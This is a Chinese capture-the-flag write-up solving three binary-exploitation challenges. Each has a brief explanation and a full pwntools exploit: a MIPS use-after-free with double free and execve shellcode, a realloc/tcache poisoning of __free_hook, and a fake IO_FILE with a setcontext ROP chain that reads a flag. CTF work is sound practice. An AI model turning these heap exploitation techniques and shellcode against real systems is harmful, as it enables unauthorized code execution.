比赛时间有点短,下载附件
easyKooc
mips pwn,UAF漏洞,给了stack地址,利用edit处leak出canary,然后double free申请到栈上修改返回地址为堆地址,提前在堆上布置shellcode
1 | from pwn import* |
2 | context.binary = './main' |
3 | #context.log_level = 'DEBUG' |
4 | def menu(ch): |
5 | p.sendlineafter('choice',str(ch)) |
6 | def new(idx,content): |
7 | menu(1) |
8 | p.sendlineafter('id',str(idx)) |
9 | p.sendafter('content',content) |
10 | def free(index): |
11 | menu(2) |
12 | p.sendlineafter('id!',str(index)) |
13 | def message(mess): |
14 | menu(3) |
15 | p.sendafter('?',mess) |
16 | #p = process('qemu-mipsel -g 1234 -L . ./main.bak',shell=True) |
17 | #p = process('qemu-mipsel -L . ./main.bak',shell=True) |
18 | p = remote('121.36.166.138',8889) |
19 | libc =ELF('./libc-2.23.so') |
20 | p.sendafter('motto!','FMYY') |
21 | p.recvuntil('gift for you: ') |
22 | stack = int(p.recv(10),16) + 0x20 |
23 | log.info('Stack:\t' + hex(stack)) |
24 | message('F'*(0x21-4) + 'FMYY') |
25 | p.recvuntil('FMYY') |
26 | canary = u32(p.recv(3).rjust(4,'\x00')) |
27 | log.info('Canary:\t' + hex(canary)) |
28 | message('\x00'*0x18 + 'FMYY' + p32(0x41) + '\x00') |
29 | shellcode = "" |
30 | shellcode += "\xFF\xFF\x10\x04\xAB\x0F\x02\x24" |
31 | shellcode += "\x55\xF0\x46\x20\x66\x06\xFF\x23" |
32 | shellcode += "\xC2\xF9\xEC\x23\x66\x06\xBD\x23" |
33 | shellcode += "\x9A\xF9\xAC\xAF\x9E\xF9\xA6\xAF" |
34 | shellcode += "\x9A\xF9\xBD\x23\x21\x20\x80\x01" |
35 | shellcode += "\x21\x28\xA0\x03\xCC\xCD\x44\x03" |
36 | shellcode += "/bin/sh" |
37 | new(1,'FMYY') |
38 | new(2,'FMYY') |
39 | free(1) |
40 | free(2) |
41 | free(1) |
42 | new(3,p32(stack)) |
43 | new(4,'\x00') |
44 | p.recvuntil('is: ') |
45 | heap_base = u32(p.recv(3).ljust(4,'\x00')) |
46 | log.info('HEAP:\t' + hex(heap_base)) |
47 | new(5,shellcode) |
48 | new(6,p32(canary) + p32(0) + p32(heap_base + 0x78)) |
49 | menu(4) |
50 | p.interactive() |
seven hero
realloc导致UAF,当size=0的时候 就是一个free的效果,先利用gift位置leak 出libc,然后tcache poisoning 攻击free_hook即可
1 | from pwn import* |
2 | context.log_level = 'DEBUG' |
3 | def menu(ch): |
4 | p.sendlineafter('choice:',str(ch)) |
5 | def new(index,size,content): |
6 | menu(1) |
7 | p.sendlineafter('index:',str(index)) |
8 | p.sendlineafter('size:',str(size)) |
9 | p.sendafter('content:',content) |
10 | def free(index): |
11 | menu(3) |
12 | p.sendlineafter('index:',str(index)) |
13 | def edit(index,size,content): |
14 | menu(2) |
15 | p.sendlineafter('index:',str(index)) |
16 | p.sendlineafter('size:',str(size)) |
17 | p.sendafter('content:',content) |
18 | def show(index): |
19 | menu(4) |
20 | p.sendlineafter('index',str(index)) |
21 | def F(index): |
22 | menu(2) |
23 | p.sendlineafter('index:',str(index)) |
24 | p.sendlineafter('size:',str(0)) |
25 | p = process('./main') |
26 | p = remote('119.3.89.93',8011) |
27 | libc =ELF('./libc-2.29.so') |
28 | for i in range(9): |
29 | new(i,0x10,'FMYY') |
30 | for i in range(7): |
31 | free(8 - i) |
32 | F(0) |
33 | F(1) |
34 | edit(1,0x10,'\x50') |
35 | new(2,0x10,'FMYY') |
36 | new(3,0x10,'/bin/sh\x00') |
37 | menu(666) |
38 | p.recvuntil('there is a gift: ') |
39 | libc_base = int(p.recv(14),16) - libc.sym['printf'] - 0x201910 |
40 | log.info('LIBC:\t' + hex(libc_base)) |
41 | p.sendline('FMYY') |
42 | new(4,0x50,'FMYY') |
43 | F(4) |
44 | edit(4,0x50,'\x00'*0x10) |
45 | F(4) |
46 | menu(666) |
47 | p.sendline(p64(libc_base + libc.sym['__free_hook'])) |
48 | menu(666) |
49 | p.sendline('FMYY') |
50 | menu(666) |
51 | p.sendline(p64(libc_base + libc.sym['system'])) |
52 | free(3) |
53 | p.interactive() |
manager
add申请的时候,如果size不符合条件,会返回,而edit的时候,没有检测,所以通过残留信息来控制指针,实现任意写
1 | from pwn import* |
2 | #context.log_level = 'DEBUG' |
3 | context.binary = './main' |
4 | def init(string1,string2): |
5 | p.sendafter('Input String1:',string1) |
6 | p.sendafter('Input String2:',string2) |
7 | def menu(ch): |
8 | p.sendlineafter('>>>',str(ch)) |
9 | def new(name,index,size,content,sign=1): |
10 | menu(1) |
11 | p.sendafter('Input Name of Staff:',name) |
12 | p.sendlineafter('Input Number of Staff:',str(index)) |
13 | p.sendlineafter('Input len of Info:',str(size)) |
14 | p.sendafter('get Info:',content) |
15 | def rename(index,name): |
16 | menu(2) |
17 | p.sendlineafter('Input Number:',str(index)) |
18 | p.sendlineafter('Info','1') |
19 | p.sendafter('name:',name) |
20 | def reinfo(index,size,content): |
21 | menu(2) |
22 | p.sendlineafter('Input Number:',str(index)) |
23 | p.sendlineafter('Info','2') |
24 | p.sendlineafter('Input len of Info:',str(size)) |
25 | p.sendafter('info:',content) |
26 | def free(index): |
27 | menu(3) |
28 | p.sendlineafter('Input Number of Staff:',str(index)) |
29 | def show(index): |
30 | menu(4) |
31 | p.sendlineafter('Input staff number:',str(index)) |
32 | p = process('./main') |
33 | p = remote('122.112.231.25',8005) |
34 | libc =ELF('./libc-2.23.so') |
35 | init('\x01F\n','\x02!\n') |
36 | new('fmyy',0,0x80,'FMYY') |
37 | new('fmyy',1,0x80,'FMYY') |
38 | new('fmyy',2,0x10,'FMYY') |
39 | free(1) |
40 | free(0) |
41 | new('FMYYSSSS',0,0x40,'\xA0') |
42 | show(0) |
43 | p.recvuntil('FMYYSSSS') |
44 | heap_base = u64(p.recv(6).ljust(8,'\x00')) - 0x60 |
45 | libc_base = u64(p.recvuntil('\x7F')[-6:].ljust(8,'\x00')) - libc.sym['__malloc_hook'] - 0x90 |
46 | log.info('HEAP:\t' + hex(heap_base)) |
47 | log.info('LIBC:\t' + hex(libc_base)) |
48 | new('fmyy',1,0x20,'FMYY') |
49 | #################################### |
50 | free_hook = libc_base + libc.sym['__free_hook'] |
51 | |
52 | pop_rdi_ret = libc_base + 0x0000000000021112 |
53 | pop_rsi_ret = libc_base + 0x00000000000202F8 |
54 | pop_rdx_ret = libc_base + 0x0000000000001B92 |
55 | syscall = libc_base + libc.sym['syscall'] + 23 |
56 | |
57 | Open = libc_base + libc.symbols["open"] |
58 | Read = libc_base + libc.symbols["read"] |
59 | Puts = libc_base + libc.symbols['puts'] |
60 | IO_str_jumps = libc_base + 0x3C37A0 |
61 | ret = libc_base + 0x937 |
62 | fake_IO_FILE = p64(0) + p64(0) |
63 | fake_IO_FILE += p64(0) + p64(1) |
64 | fake_IO_FILE += p64(0) + p64(heap_base + 0x520) |
65 | fake_IO_FILE = fake_IO_FILE.ljust(0xC8,'\x00') |
66 | fake_IO_FILE += p64(IO_str_jumps - 8) |
67 | fake_IO_FILE += p64(0) + p64(libc_base + libc.sym['setcontext'] + 53) |
68 | |
69 | orw = p64(pop_rdi_ret)+p64(heap_base + 0x778) |
70 | orw += p64(pop_rsi_ret)+p64(0) |
71 | orw += p64(Open) |
72 | orw += p64(pop_rdi_ret) + p64(3) |
73 | orw += p64(pop_rdx_ret) + p64(0x30) |
74 | orw += p64(pop_rsi_ret) + p64(heap_base) |
75 | orw += p64(Read) |
76 | orw += p64(pop_rdi_ret) + p64(heap_base) |
77 | orw += p64(Puts) |
78 | orw = orw.ljust(0xE8,'\x00') |
79 | orw += './flag\x00\x00' |
80 | |
81 | |
82 | frame = SigreturnFrame() |
83 | frame.rsp = heap_base + 0x690 |
84 | frame.rip = ret |
85 | |
86 | #################################### |
87 | |
88 | new(p64(heap_base) + p64(0x100),3,0x38,'\x00'*0x30 + p64(heap_base + 0x310)) |
89 | reinfo(3,0x10,'FMYY') |
90 | |
91 | menu(1) |
92 | p.sendafter('Input Name of Staff:',p64(heap_base + 0x2F0) + p64(0x10)) |
93 | p.sendlineafter('Input Number of Staff:','4') |
94 | p.sendlineafter('Input len of Info:',str(0x101)) |
95 | new('fmyy',5,0x100,fake_IO_FILE) |
96 | reinfo(4,0x10,p64(free_hook)) |
97 | rename(4,p64(libc_base + libc.sym['exit'])) |
98 | |
99 | reinfo(4,0x10,p64(libc_base+libc.symbols['_IO_list_all'])) |
100 | rename(4,p64(heap_base + 0x3A0)) |
101 | |
102 | new('fmyy',6,0x100,str(frame)) |
103 | new('fmyy',7,0x100,orw) |
104 | free(0) |
105 | p.interactive() |